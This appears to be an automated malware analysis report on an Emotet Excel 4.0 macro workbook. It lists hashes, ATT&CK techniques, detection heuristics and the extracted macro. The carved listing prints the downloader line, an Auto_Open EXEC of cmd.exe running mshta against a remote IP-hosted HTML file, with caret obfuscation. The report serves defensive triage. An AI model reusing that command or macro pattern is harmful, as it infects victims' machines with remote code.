Emotet Office (OLE) / .XLSX malware analysis — malicious · 170703bf2d71008a

MALICIOUS

Office (OLE) / .XLSX

46.6 KB Created: 2022-01-27 20:28:58 Authoring application: Microsoft Excel

MD5: 930664edc30bc72297e26a179adaac78 SHA-1: ab8641c16c43d6cb568b2e6009a2f7b4272b56cb SHA-256: 170703bf2d71008a16bf54ff8e3f62f3d681f0b268c18494314660d502391dfe

322 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The sample is an Excel 4.0 macro-enabled workbook detected as Emotet. It contains an Auto_Open macro that executes a command to download and run a malicious HTML Application from a specific URL. The macro uses the `EXEC` function with `CMD.EXE /c mshta` to achieve this, indicating a downloader functionality.

Heuristics 8

ClamAV: Xls.Downloader.Emotet-a5251d3d2d6d3722-9951020-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.Emotet-a5251d3d2d6d3722-9951020-0
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^lB In document text (OLE body)
- http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^lIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt
35c6392f3f47777cde9d382a31f57105320ae94d070fad4c70fea323e0dab4b2 xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 1049 bytes

Filename	Kind	Source	Size
`xlm_macros.txt` `35c6392f3f47777cde9d382a31f57105320ae94d070fad4c70fea323e0dab4b2`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	1049 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 shell/COM execution token(s). Carved macro source contains an auto-exec entry point and execution/download terms.
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - GODVI ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d GODVI!J1 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' GODVI,J14,EXEC("CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l"),"" ' GODVI,J21,HALT(),""

Detection

ClamAV: No threats found

Obfuscation or payload: likely

Carved artifact contains 1 shell/COM execution token(s). Carved macro source contains an auto-exec entry point and execution/download terms.

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  GODVI
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  GODVI!J1 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  GODVI,J14,EXEC("CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l"),""
'  GODVI,J21,HALT(),""

Open this report in the interactive analyzer, or submit your own file for analysis.